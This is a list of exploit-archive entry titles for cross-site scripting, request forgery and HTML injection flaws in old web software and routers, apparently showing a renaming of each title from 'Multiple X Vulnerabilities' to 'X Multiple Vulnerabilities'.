Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (2)

DoceboLms 4.0.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities
DoceboLms 4.0.4 - Persistent Cross-Site Scripting Multiple Vulnerabilities
docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities
SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities
docuFORM Mercury WebApp 6.16a/5.20 - Cross-Site Scripting Multiple Vulnerabilities
SocialCMS 1.0.2 - Cross-Site Request Forgery Multiple Vulnerabilities

ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities
ManageEngine ServiceDesk Plus 8.0 Build 8013 - Cross-Site Scripting Multiple Vulnerabilities

ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities
ManageEngine ServiceDesk Plus 8.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Family CMS 2.7.2 - Persistent Cross-Site Scripting Multiple Vulnerabilities

FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities
FCMS CMS 2.7.2 - Cross-Site Request Forgery Multiple Vulnerabilities

Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Plume CMS 1.2.4 - Persistent Cross-Site Scripting Multiple Vulnerabilities
Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
Sphinix Mobile Web Server 3.1.2.47 - Persistent Cross-Site Scripting Multiple Vulnerabilities
Apache Struts - Persistent Cross-Site Scripting Multiple Vulnerabilities

FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities
FlexCMS 3.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities

Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities
Sitecom WLM-2501 - Cross-Site Request Forgery Multiple Vulnerabilities

vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities
vBshop - Persistent Cross-Site Scripting Multiple Vulnerabilities

XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
XOOPS 2.5.4 - Cross-Site Scripting Multiple Vulnerabilities

Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities
Oracle GlassFish Server 3.1.1 (build 12) - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Zingiri Web Shop 2.4.0 - Cross-Site Scripting Multiple Vulnerabilities

WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress 3.3.1 - Cross-Site Request Forgery Multiple Vulnerabilities

Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities
Baby Gekko CMS 1.1.5c - Persistent Cross-Site Scripting Multiple Vulnerabilities

Zoho BugTracker - Multiple Persistent Cross-Site Scripting Vulnerabilities
Zoho BugTracker - Persistent Cross-Site Scripting Multiple Vulnerabilities

T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities
T-dah Webmail Client - Persistent Cross-Site Scripting Multiple Vulnerabilities

Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities
Hivemail Webmail - Persistent Cross-Site Scripting Multiple Vulnerabilities
Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities
XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Wiki Web Help 0.3.9 - Persistent Cross-Site Scripting Multiple Vulnerabilities
XWiki 4.2-milestone-2 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities
Geeklog 1.3.5 - Cross-Site Scripting Multiple Vulnerabilities
Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities
Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities
Kerio MailServer 5.0/5.1 Web Mail - Cross-Site Scripting Multiple Vulnerabilities
Mozilla Bonsai - Cross-Site Scripting Multiple Vulnerabilities

SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting Multiple Vulnerabilities

phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities
phpLinkat 0.1 - Cross-Site Scripting Multiple Vulnerabilities

PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 5.x/6.0/6.5 Beta 1 - Cross-Site Scripting Multiple Vulnerabilities

PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 6.0 - Cross-Site Scripting Multiple Vulnerabilities

Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Endpoint Protector 4.0.4.2 - Persistent Cross-Site Scripting Multiple Vulnerabilities

EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities
EZ Publish 2.2.7/3.0 - Cross-Site Scripting Multiple Vulnerabilities

WebChat 2.0 - 'users.php?Database 'Username' Disclosure
WebChat 2.0 - 'users.php?Database Username Disclosure
PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities
Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities
PostNuke 0.723 - Cross-Site Scripting Multiple Vulnerabilities
Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Cross-Site Scripting Multiple Vulnerabilities

MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities
MegaBook 1.1/2.0/2.1 - HTML Injection Multiple Vulnerabilities

m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities
m0n0wall 1.33 - Cross-Site Request Forgery Multiple Vulnerabilities

Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities
Enterpriser16 Load Balancer 7.1 - Cross-Site Scripting Multiple Vulnerabilities

Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board 1.3 - Cross-Site Scripting Multiple Vulnerabilities

YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities
YABB SE 1.5.1 - Cross-Site Scripting Multiple Vulnerabilities

PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke MS-Analysis Module - Cross-Site Scripting Multiple Vulnerabilities

BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities
BlackBoard Learning System 5.x/6.0 - Cross-Site Scripting Multiple Vulnerabilities

PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities
PHPX 3.x - Cross-Site Scripting Multiple Vulnerabilities

Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities
Adam Webb NukeJokes 1.7/2.0 Module - Cross-Site Scripting Multiple Vulnerabilities

Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities
Liferay Enterprise Portal 1.x/2.x/5.0.2 - Cross-Site Scripting Multiple Vulnerabilities

Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities
Crafty Syntax Live Help 2.7.3 - HTML Injection Multiple Vulnerabilities

PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 6.x/7.x Reviews Module - Cross-Site Scripting Multiple Vulnerabilities

Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities
Mantis 0.x - Cross-Site Scripting Multiple Vulnerabilities
PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities
Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities
PHP Code Snippet Library 0.8 - Cross-Site Scripting Multiple Vulnerabilities
Nagl XOOPS Dictionary Module 1.0 - Cross-Site Scripting Multiple Vulnerabilities

glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities
glFusion 1.2.2 - Cross-Site Scripting Multiple Vulnerabilities
MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities
MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities
MTP Guestbook 1.0 - Cross-Site Scripting Multiple Vulnerabilities
MTP Poll 1.0 - Cross-Site Scripting Multiple Vulnerabilities

DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities
DCP-Portal 3.7/4.x/5.x - HTML Injection Multiple Vulnerabilities

FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities
FuseTalk Forum 4.0 - Cross-Site Scripting Multiple Vulnerabilities

Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities
Mark Zuckerberg Thefacebook - Cross-Site Scripting Multiple Vulnerabilities

ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities
ViewGit 0.0.6 - Cross-Site Scripting Multiple Vulnerabilities

Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities
Vanilla Forums Van2Shout Plugin 1.0.51 - Cross-Site Request Forgery Multiple Vulnerabilities
WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities
ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities
WorkBoard 1.2 - Cross-Site Scripting Multiple Vulnerabilities
ProjectBB 0.4.5.1 - Cross-Site Scripting Multiple Vulnerabilities

Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities
Exponent CMS 0.95 - Cross-Site Scripting Multiple Vulnerabilities

PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 6.x/7.x - Cross-Site Scripting Multiple Vulnerabilities

ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities
ZeroBoard 4.1 - Cross-Site Scripting Multiple Vulnerabilities

OOApp Guestbook - Multiple HTML Injection Vulnerabilities
OOApp Guestbook - HTML Injection Multiple Vulnerabilities

CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities
CubeCart 2.0.x - Cross-Site Scripting Multiple Vulnerabilities

PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities
PHP Arena PAFileDB 3.1 - Cross-Site Scripting Multiple Vulnerabilities

PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities
PunBB 1.2.3 - HTML Injection Multiple Vulnerabilities

PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities
PHPOpenChat 3.0.1 - HTML Injection Multiple Vulnerabilities

Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities
Oracle Reports Server 10g - Cross-Site Scripting Multiple Vulnerabilities

Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities
Nuke BookMarks 0.6 - Cross-Site Scripting Multiple Vulnerabilities

Tkai's Shoutbox - 'Query' URI redirection
Tkai's Shoutbox - 'Query' Open Redirection

CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities
CPG Dragonfly 9.0.2.0 - Cross-Site Scripting Multiple Vulnerabilities

Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Alstrasoft EPay Pro 2.0 - Cross-Site Scripting Multiple Vulnerabilities

PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 7.6 Web_Links Module - Cross-Site Scripting Multiple Vulnerabilities

Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities
Ultimate PHP Board 1.8/1.9 - Cross-Site Scripting Multiple Vulnerabilities

PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities
PWSPHP 1.2 - Cross-Site Scripting Multiple Vulnerabilities

Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities
Skull-Splitter Guestbook 1.0/2.0/2.2 - HTML Injection Multiple Vulnerabilities

Spread The Word - Multiple Cross-Site Scripting Vulnerabilities
Spread The Word - Cross-Site Scripting Multiple Vulnerabilities

Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities
Kasseler CMS 1.3.4 Lite - Cross-Site Scripting Multiple Vulnerabilities

Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities
Cerberus Helpdesk 0.97.3/2.6.1 - Cross-Site Scripting Multiple Vulnerabilities

Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities
Comersus Open Technologies Comersus Cart 6.0.41 - Cross-Site Scripting Multiple Vulnerabilities

PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities
PHPMyFAQ 1.5.1 - Cross-Site Scripting Multiple Vulnerabilities
@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities
Easypx41 - Multiple Cross-Site Scripting Vulnerabilities
@Mail 4.0/4.13 - Cross-Site Scripting Multiple Vulnerabilities
Easypx41 - Cross-Site Scripting Multiple Vulnerabilities

PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities
PHPFreeNews 1.x - Cross-Site Scripting Multiple Vulnerabilities

SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities
SaveWebPortal 3.4 - Cross-Site Scripting Multiple Vulnerabilities

MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities
MAXdev MD-Pro 1.0.73 - Cross-Site Scripting Multiple Vulnerabilities

phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities
phpCommunityCalendar 4.0 - Cross-Site Scripting Multiple Vulnerabilities

PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities
PHP Advanced Transfer Manager 1.30 - Cross-Site Scripting Multiple Vulnerabilities

TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities
TellMe 1.2 - Cross-Site Scripting Multiple Vulnerabilities

Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities
Comersus Backoffice Plus - Cross-Site Scripting Multiple Vulnerabilities

Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities
Flyspray 0.9 - Cross-Site Scripting Multiple Vulnerabilities

PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities
PBLang 4.65 - Cross-Site Scripting Multiple Vulnerabilities

SAP Web Application Server 6.x/7.0 - URI redirection
SAP Web Application Server 6.x/7.0 - Open Redirection

PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities
PHPWCMS 1.2.5 -DEV - Cross-Site Scripting Multiple Vulnerabilities

PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities
PBLang Bulletin Board System 4.65 - HTML Injection Multiple Vulnerabilities

FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities
FreeWebStat 1.0 - Cross-Site Scripting Multiple Vulnerabilities

NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities
NetAuctionHelp 3.0 - Cross-Site Scripting Multiple Vulnerabilities

CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities
CourseForum Technologies ProjectForum 4.7 - Cross-Site Scripting Multiple Vulnerabilities

AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities
AltantForum 4.0.2 - Cross-Site Scripting Multiple Vulnerabilities

Soft4e ECW-Cart 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities
Soft4e ECW-Cart 2.0.3 - Cross-Site Scripting Multiple Vulnerabilities

Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities
Dick Copits PDEstore 1.8 - Cross-Site Scripting Multiple Vulnerabilities

Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities
Advanced Guestbook 2.x - Cross-Site Scripting Multiple Vulnerabilities

Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities
Caravel CMS 3.0 Beta 1 - Cross-Site Scripting Multiple Vulnerabilities

Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities
Liferay Portal Enterprise 3.6.1 - Cross-Site Scripting Multiple Vulnerabilities

Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities
Beehive Forum 0.6.2 - HTML Injection Multiple Vulnerabilities

ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities
ComputerOil Redakto CMS 3.2 - Cross-Site Scripting Multiple Vulnerabilities
Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities
Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities
Dell PacketTrap MSP RMM 6.6.x - Cross-Site Scripting Multiple Vulnerabilities
Dell PacketTrap PSA 7.1 - Cross-Site Scripting Multiple Vulnerabilities

FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities
FatWire UpdateEngine 6.2 - Cross-Site Scripting Multiple Vulnerabilities

Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities
Kayako SupportSuite 3.0 0.26 - Cross-Site Scripting Multiple Vulnerabilities

Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities
Faq-O-Matic 2.711 - Cross-Site Scripting Multiple Vulnerabilities

GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities
GTP iCommerce - Cross-Site Scripting Multiple Vulnerabilities

CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities
CheesyBlog 1.0 - HTML Injection Multiple Vulnerabilities

MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities
MyBB 1.0.2 - Cross-Site Scripting Multiple Vulnerabilities
SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities
CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities
cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities
SoftMaker Shop - Cross-Site Scripting Multiple Vulnerabilities
CyberShop Ultimate E-Commerce - Cross-Site Scripting Multiple Vulnerabilities
cPanel 10.8.1 - Cross-Site Scripting Multiple Vulnerabilities

Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities
Papoo 2.1.x - Cross-Site Scripting Multiple Vulnerabilities

Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities
Clever Copy 2.0/3.0 - HTML Injection Multiple Vulnerabilities

V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities
V-Webmail 1.6.2 - Cross-Site Scripting Multiple Vulnerabilities
Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6 1 Your_Account Module - Cross-Site Scripting Multiple Vulnerabilities
Dragonfly CMS 9.0.6 1 News Module - Cross-Site Scripting Multiple Vulnerabilities
Dragonfly CMS 9.0.6.1 Stories_Archive Module - Cross-Site Scripting Multiple Vulnerabilities
Dragonfly CMS 9.0.6.1 Web_Links Module - Cross-Site Scripting Multiple Vulnerabilities
Dragonfly CMS 9.0.6.1 Surveys Module - Cross-Site Scripting Multiple Vulnerabilities

TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities
TextFileBB 1.0 - Cross-Site Scripting Multiple Vulnerabilities

txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities
txtForum 1.0.3/1.0.4 - Cross-Site Scripting Multiple Vulnerabilities

FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities
FusionZONE CouponZONE 4.2 - Cross-Site Scripting Multiple Vulnerabilities
ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities
RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities
ActiveCampaign SupportTrio 2.50.2 - Cross-Site Scripting Multiple Vulnerabilities
RealestateZONE 4.2 - Cross-Site Scripting Multiple Vulnerabilities

AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities
AL-Caricatier 2.5 - Cross-Site Scripting Multiple Vulnerabilities

Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Bitweaver CMS 1.3 - Cross-Site Scripting Multiple Vulnerabilities

Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities
Tritanium Bulletin Board 1.2.3 - Cross-Site Scripting Multiple Vulnerabilities

Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities
Interaktiv.shop 4/5 - Cross-Site Scripting Multiple Vulnerabilities

Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities
Manila 9.0.1 - Cross-Site Scripting Multiple Vulnerabilities

BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities
BannerFarm 2.3 - Cross-Site Scripting Multiple Vulnerabilities

Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities
Portal Pack 6.0 - Cross-Site Scripting Multiple Vulnerabilities
NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities
PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities
NextAge Shopping Cart - HTML Injection Multiple Vulnerabilities
PHPWebFTP 2.3 - Cross-Site Scripting Multiple Vulnerabilities
CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities
Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities
CuteNews 1.4.1 - Cross-Site Scripting Multiple Vulnerabilities
Farsinews 2.5.3 - Cross-Site Scripting Multiple Vulnerabilities

SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities
SunShop Shopping Cart 3.5 - Cross-Site Scripting Multiple Vulnerabilities

MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities
MyNews 1.6.2 - Cross-Site Scripting Multiple Vulnerabilities
AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities
vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities
AR-Blog 5.2 - Cross-Site Scripting Multiple Vulnerabilities
vCard 2.9 - Cross-Site Scripting Multiple Vulnerabilities

Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities
Portix-PHP 2-0.3.2 Portal - Cross-Site Scripting Multiple Vulnerabilities

DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities
DELTAScripts PHP Pro Publish 2.0 - Cross-Site Scripting Multiple Vulnerabilities
vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities
Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities
vBulletin 2.x/3.x - Cross-Site Scripting Multiple Vulnerabilities
Datecomm 1.1 - Cross-Site Scripting Multiple Vulnerabilities

H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities
H-Sphere 2.5.1 - Cross-Site Scripting Multiple Vulnerabilities

QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities
QTO File Manager 1.0 - Cross-Site Scripting Multiple Vulnerabilities

PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities
PostNuke 0.6x/0.7x - Cross-Site Scripting Multiple Vulnerabilities

D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities
D-Link DSL-2740B - Cross-Site Request Forgery Multiple Vulnerabilities

BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities
BlackBoard Products 6 - HTML Injection Multiple Vulnerabilities

BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities
BlaBla 4U - Cross-Site Scripting Multiple Vulnerabilities

MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities
MyBB 1.1.7 - HTML Injection Multiple Vulnerabilities

Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities
Open-Xchange Guard 2.4.2 - Cross-Site Scripting Multiple Vulnerabilities

IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities
IDevSpot BizDirectory 1.9 - Cross-Site Scripting Multiple Vulnerabilities

EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities
EXPBlog 0.3.5 - Cross-Site Scripting Multiple Vulnerabilities

Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities
Yetihost Helm 3.2.10 - Cross-Site Scripting Multiple Vulnerabilities

Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities
Sphpblog 0.8 - Cross-Site Scripting Multiple Vulnerabilities

cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities
cPanel 11 Beta - Cross-Site Scripting Multiple Vulnerabilities

cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities
cPanel Web Hosting Manager 3.1 - Cross-Site Scripting Multiple Vulnerabilities

Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities
Omniture SiteCatalyst - Cross-Site Scripting Multiple Vulnerabilities

Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities
Mobilelib Gold - Cross-Site Scripting Multiple Vulnerabilities
212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities
Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities
212Cafe Board - Cross-Site Scripting Multiple Vulnerabilities
Bitweaver 1.3.1 Articles and Blogs - Cross-Site Scripting Multiple Vulnerabilities

WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities
WordPress 2.1.1 - Cross-Site Scripting Multiple Vulnerabilities

Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities
Woltlab Burning Board 2.3.6 - HTML Injection Multiple Vulnerabilities

WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities
WMSCMS 2.0 - Cross-Site Scripting Multiple Vulnerabilities

TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities
TP-Link WR740N/WR740ND - Cross-Site Request Forgery Multiple Vulnerabilities

phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities
phpMyAdmin 2.9.1 - Cross-Site Scripting Multiple Vulnerabilities

Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities
Scientific-Atlanta_ Inc. DPR2320R2 - Cross-Site Request Forgery Multiple Vulnerabilities

Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities
Digirez 3.4 - Cross-Site Scripting Multiple Vulnerabilities

eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities
eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting Multiple Vulnerabilities

Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities
Calendarix 0.7.20070307 - Cross-Site Scripting Multiple Vulnerabilities

Oliver - Multiple Cross-Site Scripting Vulnerabilities
Oliver - Cross-Site Scripting Multiple Vulnerabilities

ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities
ASP cvmatik 1.1 - HTML Injection Multiple Vulnerabilities

Beetel TC1-450 Airtel Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities
Beetel TC1-450 Airtel Wireless Router - Cross-Site Request Forgery Multiple Vulnerabilities

Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities
Vigile CMS 1.8 Wiki Module - Cross-Site Scripting Multiple Vulnerabilities

Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities
Stuffed Guys Stuffed Tracker - Cross-Site Scripting Multiple Vulnerabilities
Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities
Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities
Technicolor TC7200 - Cross-Site Request Forgery Multiple Vulnerabilities
Technicolor TC7200 - Cross-Site Scripting Multiple Vulnerabilities

pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities
pMachine Pro 2.4.1 - Cross-Site Scripting Multiple Vulnerabilities
Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities
SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities
Alcatel Lucent Omnivista 4760 - Cross-Site Scripting Multiple Vulnerabilities
SocketKB 1.1.5 - Cross-Site Scripting Multiple Vulnerabilities

Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Seagate BlackArmor NAS sg2000-2000.1331 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities
Flyspray 0.9.9 - Cross-Site Scripting Multiple Vulnerabilities

AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities
AwesomeTemplateEngine 1 - Cross-Site Scripting Multiple Vulnerabilities

Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities
Snitz Forums 2000 3.4.5/3.4.6 - Cross-Site Scripting Multiple Vulnerabilities

Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component SMF Forum 1.1.4 - Cross-Site Scripting Multiple Vulnerabilities

